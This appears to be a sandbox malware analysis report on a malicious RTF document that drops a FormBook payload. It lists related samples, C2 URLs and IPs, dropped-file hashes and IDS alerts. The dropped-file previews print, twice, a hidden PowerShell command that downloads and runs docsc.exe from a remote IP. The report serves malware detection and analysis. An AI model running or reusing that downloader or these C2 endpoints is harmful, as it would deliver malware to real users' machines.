 | Purchase Order.exe | malicious | www.xn--demirelik-u3a.com/u8nw/?wJB=-ZLXOP0XzvBHZPRp&jZhtajbP=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThGJ2Yxzzpw8J
 | New Order.exe | malicious | www.britainblog.com/un8c/?a2MLWLu=ScSc7+wN2fhzbElO1qeWCW9UaeY5Q5s50OV0RzK60v9iEHECxnAHbwg3oRc1uopK9S++&l4=1bNDCf9Pbhw
 | FY9Z5TR6rr.exe | malicious | www.myrootsandtrees.com/bucw/?4hlPBD=2DQmETE8yh4TCBan08zmwwOJR5akFTB0jDw9Ks1FGALYnxtU0Cmo6gs9aLiDFdK6Lc2EnGtSNQ==&l0GD1=xBZDi6rpmLdp-
 | PURCHASE ORDER.xlsx | malicious | www.no-dietdiet.com/bucw/?e6=dxodHDGP&zdM0JRXx=AaevXC6Zw/dWc9ErEUUud//xoPiFgQsvnIBpIpcw4NMsFbTc+swprThfuXKMl6XX0OSdQw==
 | cks.exe | malicious | www.xn--demirelik-u3a.com/u8nw/?f0=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThFl1EB/LkRBfGe9jhg==&6l6x=E4ClVdU
 | 4LkSpeVqKR.exe | malicious | www.montcoimmigrationlawyer.com/uoe8/?rDHpw=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&V2=LhqpTfJ8
 | 0a97784c_by_Libranalysis.xlsx | malicious | www.leafylyfe.com/et9g/?BZ6=TF/YS3LdfnvKlPm037wYtLAt8WY6EQJ7LI+z0LNg8R7H3LFT4rrA/oRIWqbTaqJ76YkP/g==&bdC=7njp7th
 | new order.xlsx | malicious | www.montcoimmigrationlawyer.com/uoe8/?PbvtUz=DVW7OxuWilp3hUkhBzIJzGfsiMq3vXOqW3XcgnFXnAhOJxKbpl47XK0K/rgsfP0Uf/nXgQ==&-Z=zVeT
 | Order Euro 890,000.exe | malicious | www.anvistanes.com/nbg/?AnE=N0DpoDyPy2&GzuDf=n4dYPyDMx0k3VV9rtAXeD+dEmxGAmcHEEuMb7hMO7KemGcZmCd/seF3bHBRuXqx2nn1q
 | Request for Quotation.exe | malicious | www.xn--demirelik-u3a.com/u8nw/?K8b8q=AbsdphHPUnHTPv7&Q2M=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThGJ2Yxzzpw8J

                                              Domains

Match | Associated Sample Name / URL | Detection | Context
uixie.porkbun.com | win32.exe | malicious | 44.230.85.241
 | IN18663Q0031139I.xlsx | malicious | 44.230.85.241
 | SWIFT001_jpg.exe | malicious | 52.33.207.7
 | PotentialAPT.exe | malicious | 52.33.207.7
 | Breve-Tufvassons sp.o.o Company Profile And Bout Us.exe | malicious | 52.33.207.7
 | RNM56670112.exe | malicious | 52.33.207.7
 | COVID-19FluA+B Antigen Combo Rapid Test.exe | malicious | 52.33.207.7
 | RQ100932871.exe | malicious | 44.230.85.241

                                              ASN

Match | Associated Sample Name / URL | Detection | Context
VECTANTARTERIANetworksCorporationJP | Purchase Inquiry 11.05.2021.exe | malicious | 202.210.8.60
 | 0876543123.exe | malicious | 202.210.8.120
 | Project Decision 2021.exe | malicious | 183.181.86.59
 | S4gONKzrzB.exe | malicious | 210.131.150.117
 | PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exe | malicious | 202.210.8.149
 | VIKRAMQST21-222.exe | malicious | 202.210.8.149
 | MGuvcs6Ocz | malicious | 157.14.182.109
 | SWIFT COPY.exe | malicious | 103.141.96.11
 | 9JFrEPf5w7.exe | malicious | 103.15.186.68
 | Purchase Order.xlsx | malicious | 103.15.186.68
 | PO91361.exe | malicious | 103.15.186.10
 | ccavero@hycite.com.htm | malicious | 203.114.55.132
 | MV Sky Marine.xlsx | malicious | 202.210.8.141
 | SWIFT COPY_PDF.exe | malicious | 202.210.8.141
 | MV9tCJw8Xr.exe | malicious | 120.51.34.254
 | SHED.EXE | malicious | 103.141.96.21
 | swift copy pdf.exe | malicious | 183.181.84.122
 | shipping docs of MT20410.exe | malicious | 183.181.84.122
 | PO#4503527426.xlsx | malicious | 43.249.241.188
 | c8TrAKsz0T.exe | malicious | 43.249.241.188
AMAZON-02US | Order 122001-220 guanzo.exe | malicious | 18.219.49.238
 | main_setup_x86x64.exe | malicious | 104.192.141.1
 | A6FAm1ae1j.exe | malicious | 3.138.180.119
 | New_Order.exe | malicious | 75.2.115.196
 | NAVTECO_R1_10_05_2021,pdf.exe | malicious | 13.58.50.133
 | YDHhjjAEFbel88t.exe | malicious | 99.83.175.80
 | yU7RItYEQ9kCkZE.exe | malicious | 99.83.175.80
 | Shipment Document BL,INV and packing List.exe | malicious | 52.58.78.16
 | 4xPBZai06p.dll | malicious | 13.225.75.73
 | 0OyVQNXrTo.exe | malicious | 3.142.167.54
 | rAd00Nae9w.dll | malicious | 13.225.75.73
 | DOC24457188209927.exe | malicious | 13.224.193.2
                                              user-invoice-8488888.docGet hashmaliciousBrowse
                                              • 104.192.141.1
                                              user-invoice-8488888.docGet hashmaliciousBrowse
                                              • 104.192.141.1
                                              ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                              • 13.113.228.117
                                              PO9448882.exeGet hashmaliciousBrowse
                                              • 18.219.49.238
                                              jjbxg8kh5X.exeGet hashmaliciousBrowse
                                              • 52.216.177.83
                                              4si5VtPNTe.exeGet hashmaliciousBrowse
                                              • 3.6.208.121
                                              latvia-order-051121_.docGet hashmaliciousBrowse
                                              • 52.219.129.63
                                              BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                              • 3.16.197.4

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):973824
                                              Entropy (8bit):7.70861569543812
                                              Encrypted:false
                                              SSDEEP:24576:0Fu7fEF8VAJUFZ+MEEcg1B3DBp3LQySL683Olkck:oKeco9gXdBs681c
                                              MD5:457B22DA77D4DB093A31DD80A4B8963F
                                              SHA1:83DC32633108D309F6B6B50A42DC102E7375F54C
                                              SHA-256:8DC4C1A88F19DF4A3731991E632688147B6132BCB6CFFA2DFBEF8EE081C6DDAE
                                              SHA-512:988BC10454BAEA85766B9AF43D51073A155B17C63525795B55984E362B81E2E11717B947CE11C05D010682F8B92F5C73CC3918401B23CBAA44BFE976DEC6D45E
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:http://157.55.173.72/goose/docsc.exe
                                              Preview (PE header; non-printable bytes omitted): MZ […] !This program cannot be run in DOS mode […] PE..L […] .text […] .rsrc […] .reloc […]
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3A4D79D.png
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:370 sysV pure executable
                                              Category:dropped
                                              Size (bytes):262160
                                              Entropy (8bit):0.247221352544061
                                              Encrypted:false
                                              SSDEEP:96:srHrNEN+N8//zb+IfffFzlJBzkNDDN+N8//zb+IfffFDxB+3NhDN+N8/mLWrH+nA:szrNVmJJ6NumAc8zCJ6NumH
                                              MD5:6B08373CE59E1B6A082C8F908EFCB498
                                              SHA1:E761985A0EB9395FA98C3215E505FDE3F687C93D
                                              SHA-256:0C81F951A755A9619E11084FD7721C78C5558ABFC66080EB9A8A86498C006255
                                              SHA-512:A82ADB9C3C0DBA89CE0D8A172B77D66CB88AFF76E1B449CEE8115E6621625467330B853DD3E3EBEE75BDEC4BF0ED423C2F6147E8ABB5AF54BFA6B91676E2A119
                                              Malicious:false
                                              Reputation:low
                                              Preview (UTF-16LE decoded; leading bytes and trailing padding omitted): ...ows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\Albus\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\Albus\AppData\Roaming\docsc.exe'"
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADCC7F3-349E-46EF-BF24-C3A751787722}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CA5B12C-492C-4E57-AED2-0E7798ADDEF4}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):48006
                                              Entropy (8bit):3.0645151636531636
                                              Encrypted:false
                                              SSDEEP:768:kZ/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:WFia0Dqeb0nstw29rVzWSgm58F
                                              MD5:40DC8FD3190AC5BAF65BE740E0221323
                                              SHA1:4E29BCC8BF88F51C1D1068E879B285C63C75C0F5
                                              SHA-256:CF1C3C0F6FFB74E021219C869B3CD1FD194CB09968B7ED7BF00A2AB27FECA2BA
                                              SHA-512:35ABF79767DE77CBB9F0C3940DDD3C902CC445D97CE2C028D348EA473D4B658A30BA9ADC55CD4F05D38F6F05F33F15837629A6897FF409DC67C416FF403FDED9
                                              Malicious:false
                                              Preview (UTF-16LE decoded; leading bytes and trailing Word binary omitted): Microsoft Office does not work in email Preview. Please download the document and click Enable Editing when opening.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEE3E709-76F5-433D-BD56-9523C4C9DC31}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3555252507007243
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbd:IiiiiiiiiifdLloZQc8++lsJe1Mzi
                                              MD5:81B550B5F462443F1FC776E302F6225C
                                              SHA1:D695D19225D25C741D8613FE67240A00455F81FD
                                              SHA-256:24E2442FC37480FD3E39B04C7009CF4977B2198060317AE9E810B0D4BCFEECE8
                                              SHA-512:593DEABF5B70469865F60CAC5D9BC2117F4E1068B11FAC501F9059ACCCDB3A58E307027E6B8B42C4813A585FA4738DA96AF4D7FF2CA53C3DB25B07E2AE86278A
                                              Malicious:false
                                              C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):70824
                                              Entropy (8bit):5.015044883176533
                                              Encrypted:false
                                              SSDEEP:768:cyeUfayeUf+aJEaTaPxgvtL1NlzUn7ZFPW1vv:cjzaJEaTaPxmNs7m
                                              MD5:E9848FFDB5AFEC900DE17C084EF3CF1A
                                              SHA1:161CA3A6F8D7F38EDC71B4EED043DC19A19FF543
                                              SHA-256:C9040B5F852F4E1682D2AFF0CB878D8624C5D75EA95C6FFCB601555B1EF60541
                                              SHA-512:530800E8CBE8EB0050BCB38EE315E4B3201577E65D97502C416B2E749155E8E5763C4E276C5B5DF89D185B437780F67BB19BD7BFCCC18741C4FE0A79C4E4B2CD
                                              Malicious:true
                                              Preview (padding bytes omitted): <scriptlet> […] ~{|} […] ~{|} […] It took him rd whilnb to rnbrdliznb thrdt nbvnbrything hnb dnbcidnbd not to chrdngnb, hnb wrds rdcturdlly choosing. Thnby throw crdbbrdgnb thrdt turns your brrdin into nbmotionrdl brdggrdgnb. Thnb tnbrdm mnbmbnbrs wnbrnb hrdrd to tnbll rdprdrt sincnb thnby rdll wornb thnbir hrdir in rd ponytrdil. Jonb mrddnb thnb sugrdr cookinbs; Susrdn dnbcorrdtnbd thnbm. Hnb found his rdrt nnbvnbr progrnbssnbd whnbn hnb litnbrrdlly usnbd his swnbrdt rdnd tnbrdrs. Hnb wrds so prnboccupinbd with whnbthnbr or not hnb could thrdt hnb frdilnbd to stop to considnbr if hnb should. Whnbn shnb didn.t liknb rd guy who wrds trying to pick hnbr up, shnb strdrtnbd using sign lrdngurdgnb. You'rnb good rdt nbng (filler prose in which every 'a' is written as 'rd' and every 'e' as 'nb')
                                              C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT:Zone.Identifier
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:gAWY3n:qY3n
                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                              Malicious:false
                                              Preview: [ZoneTransfer]..ZoneId=3..
                                              C:\Users\user\AppData\Local\Temp\OICE_A3A241B7-2F36-435D-B046-C9F74B3487D8.0\FLDA58.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:370 sysV pure executable
                                              Category:dropped
                                              Size (bytes):262160
                                              Entropy (8bit):0.247221352544061
                                              Encrypted:false
                                              SSDEEP:96:srHrNEN+N8//zb+IfffFzlJBzkNDDN+N8//zb+IfffFDxB+3NhDN+N8/mLWrH+nA:szrNVmJJ6NumAc8zCJ6NumH
                                              MD5:6B08373CE59E1B6A082C8F908EFCB498
                                              SHA1:E761985A0EB9395FA98C3215E505FDE3F687C93D
                                              SHA-256:0C81F951A755A9619E11084FD7721C78C5558ABFC66080EB9A8A86498C006255
                                              SHA-512:A82ADB9C3C0DBA89CE0D8A172B77D66CB88AFF76E1B449CEE8115E6621625467330B853DD3E3EBEE75BDEC4BF0ED423C2F6147E8ABB5AF54BFA6B91676E2A119
                                              Malicious:false
                                              Preview (UTF-16LE decoded; leading bytes and trailing padding omitted): ...ows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\Albus\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\Albus\AppData\Roaming\docsc.exe'"
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1c60a1e9_by_Libranalysis.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed May 12 17:33:27 2021, mtime=Wed May 12 17:33:27 2021, atime=Wed May 12 17:33:32 2021, length=366007, window=hide
                                              Category:dropped
                                              Size (bytes):2168
                                              Entropy (8bit):4.576379502068498
                                              Encrypted:false
                                              SSDEEP:48:8OEP/XT0jVEeOEn6YLNnOEh5fY2OEP/XT0jVEeOEn6YLNnOEh5fc:8OM/XojmeF6YLNnFh5fY2OM/XojmeF6Z
                                              MD5:4A4F65170B2B3B37409D826247E406A7
                                              SHA1:DA6288DD5F7CD84ABE9815FDD373C79EA54738F1
                                              SHA-256:CD054360107CE703F55070F13F266A7E9ADA1109E710DE3B851A9215CB9AE774
                                              SHA-512:C6121F9E25A9E0E26D415607497F78D7B49B2B3C70B5A9E2F03ADBF3CD9BDB5D4E4986D8FD7D33A3BC0C28561D59E682EE444AB21E1BF376C40D47F5140948E1
                                              Malicious:false
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):112
                                              Entropy (8bit):4.504089105237179
                                              Encrypted:false
                                              SSDEEP:3:HG56HoUwSLMp6lzV956HoUwSLMp6lmxWG56HoUwSLMp6lv:HG56HfNDb56HfNe56HfNf
                                              MD5:CEE04730739D3EEF9045C0EB9028B25B
                                              SHA1:BC7B0AC8E8CA41DA2CE2422C97879FD56524E853
                                              SHA-256:613EF1B1D5F8D4AB0C24527A403180B58A661E5D40DAEE6E840B7776956255FC
                                              SHA-512:2B49BB51CEE59E4C3F3BDFD121393C47D55A3E7E0F6EB8B3FE7B992542C88E17EBD6F32C59680132D5BF2F16251A96C4EF5DD1E3DD75ACB4C262337D5CC8F137
                                              Malicious:false
                                              Preview: [misc]..1c60a1e9_by_Libranalysis.LNK=0..1c60a1e9_by_Libranalysis.LNK=0..[misc]..1c60a1e9_by_Libranalysis.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.431160061181642
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                              Malicious:false
                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:Qn:Qn
                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                              Malicious:false
                                              Preview: ..
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DMR481T3UO04FSSHR3G3.temp
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8016
                                              Entropy (8bit):3.5858206351478694
                                              Encrypted:false
                                              SSDEEP:96:chQCsMqdqvsqvJCwofz8hQCsMqdqvsEHyqvJCworZzv1YGH8yByCO1lUVNIu:cyUofz8yAHnorZzv6urO8Iu
                                              MD5:F9AE81732ACF72C19253B7D1EAF0F4CF
                                              SHA1:1941192132C8DC55A421218BE5787DF79ED1CE2E
                                              SHA-256:A9FB71C172C984B2CE7A30FA160FC60835640139BA0DD30779D3FF4930133B33
                                              SHA-512:82736AB8A82CA5F1C347AAFAFC46CEC054E365D3851E68026BA18570C978449650487F93F2241D5540406B0B9262C5ACB6D7842A188888544DDBF7FCC181608B
                                              Malicious:false
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L17W9ZNBCUQUI8JBPCTD.temp
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8016
                                              Entropy (8bit):3.5858206351478694
                                              Encrypted:false
                                              SSDEEP:96:chQCsMqdqvsqvJCwofz8hQCsMqdqvsEHyqvJCworZzv1YGH8yByCO1lUVNIu:cyUofz8yAHnorZzv6urO8Iu
                                              MD5:F9AE81732ACF72C19253B7D1EAF0F4CF
                                              SHA1:1941192132C8DC55A421218BE5787DF79ED1CE2E
                                              SHA-256:A9FB71C172C984B2CE7A30FA160FC60835640139BA0DD30779D3FF4930133B33
                                              SHA-512:82736AB8A82CA5F1C347AAFAFC46CEC054E365D3851E68026BA18570C978449650487F93F2241D5540406B0B9262C5ACB6D7842A188888544DDBF7FCC181608B
                                              Malicious:false
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NEKL7LLMA2OV4UGS2LPM.temp
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8016
                                              Entropy (8bit):3.5858206351478694
                                              Encrypted:false
                                              SSDEEP:96:chQCsMqdqvsqvJCwofz8hQCsMqdqvsEHyqvJCworZzv1YGH8yByCO1lUVNIu:cyUofz8yAHnorZzv6urO8Iu
                                              MD5:F9AE81732ACF72C19253B7D1EAF0F4CF
                                              SHA1:1941192132C8DC55A421218BE5787DF79ED1CE2E
                                              SHA-256:A9FB71C172C984B2CE7A30FA160FC60835640139BA0DD30779D3FF4930133B33
                                              SHA-512:82736AB8A82CA5F1C347AAFAFC46CEC054E365D3851E68026BA18570C978449650487F93F2241D5540406B0B9262C5ACB6D7842A188888544DDBF7FCC181608B
                                              Malicious:false
                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                              C:\Users\user\AppData\Roaming\docsc.exe
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):973824
                                              Entropy (8bit):7.70861569543812
                                              Encrypted:false
                                              SSDEEP:24576:0Fu7fEF8VAJUFZ+MEEcg1B3DBp3LQySL683Olkck:oKeco9gXdBs681c
                                              MD5:457B22DA77D4DB093A31DD80A4B8963F
                                              SHA1:83DC32633108D309F6B6B50A42DC102E7375F54C
                                              SHA-256:8DC4C1A88F19DF4A3731991E632688147B6132BCB6CFFA2DFBEF8EE081C6DDAE
                                              SHA-512:988BC10454BAEA85766B9AF43D51073A155B17C63525795B55984E362B81E2E11717B947CE11C05D010682F8B92F5C73CC3918401B23CBAA44BFE976DEC6D45E
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..`..............P.............. ....... ....@.. .......................@............@.................................|...O....@............................................................................... ..................H............U#j;F_`0X... ...Z..................@....text................^.............. ..`.rsrc........@......................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\Desktop\~$60a1e9_by_Libranalysis.rtf
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.431160061181642
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                              Static File Info

                                              General

                                              File type:Rich Text Format data, version 1, unknown character set
                                              Entropy (8bit):3.899302259961104
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:1c60a1e9_by_Libranalysis.rtf
                                              File size:366007
                                              MD5:1c60a1e972aaa5a3eb15c0adc2de7ead
                                              SHA1:921fed27f6b23f7f810ee03eeefb91634a295592
                                              SHA256:605e84b01e008da482a744feb468d9dd842148850fda1694a6772b6e38cc6c82
                                              SHA512:a6789f5cca2d7f18297bf0f1322e43ceb0a2d1d27f40a5f0c37b21cbcf86332ec2a9a68e8734192be7b4b002719d149538410eb6d3b38352a679432cadc3e9ac
                                              SSDEEP:3072:9NBrB2BrBrP5lHKK+aVYdzFDr5RDAw5wf/:VVcVr7KraVYdzFD1RDAUw3
                                              File Content Preview:{\rtf1\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEFlangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c667364

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static RTF Info

                                              Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 00007110h | 2 | embedded | package | 70922 | AbctfhgXgdghgh.ScT | C:\jsdsDggf\AbctfhgXGdghgh.ScT | C:\kakepatY\Abctfhghgdghgh.ScT | no
1 | 0002B241h | 2 | embedded | OLE2LInk | 2560 |  |  |  | no

                                              Network Behavior

                                              Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/12/21-11:35:00.035894 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 184.168.131.241
05/12/21-11:35:00.035894 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 184.168.131.241
05/12/21-11:35:00.035894 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 184.168.131.241
05/12/21-11:35:05.872672 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 202.210.8.86
05/12/21-11:35:05.872672 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 202.210.8.86
05/12/21-11:35:05.872672 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 202.210.8.86
05/12/21-11:35:18.930278 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 75.2.115.196 | 192.168.2.22
05/12/21-11:35:24.188290 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49170 | 34.102.136.180 | 192.168.2.22
05/12/21-11:35:29.433298 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49171 | 80 | 192.168.2.22 | 107.155.89.74
05/12/21-11:35:29.433298 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49171 | 80 | 192.168.2.22 | 107.155.89.74
05/12/21-11:35:29.433298 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49171 | 80 | 192.168.2.22 | 107.155.89.74
05/12/21-11:35:40.820714 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49173 | 80 | 192.168.2.22 | 44.230.85.241
05/12/21-11:35:40.820714 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49173 | 80 | 192.168.2.22 | 44.230.85.241
05/12/21-11:35:40.820714 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49173 | 80 | 192.168.2.22 | 44.230.85.241

                                              Network Port Distribution

                                              TCP Packets

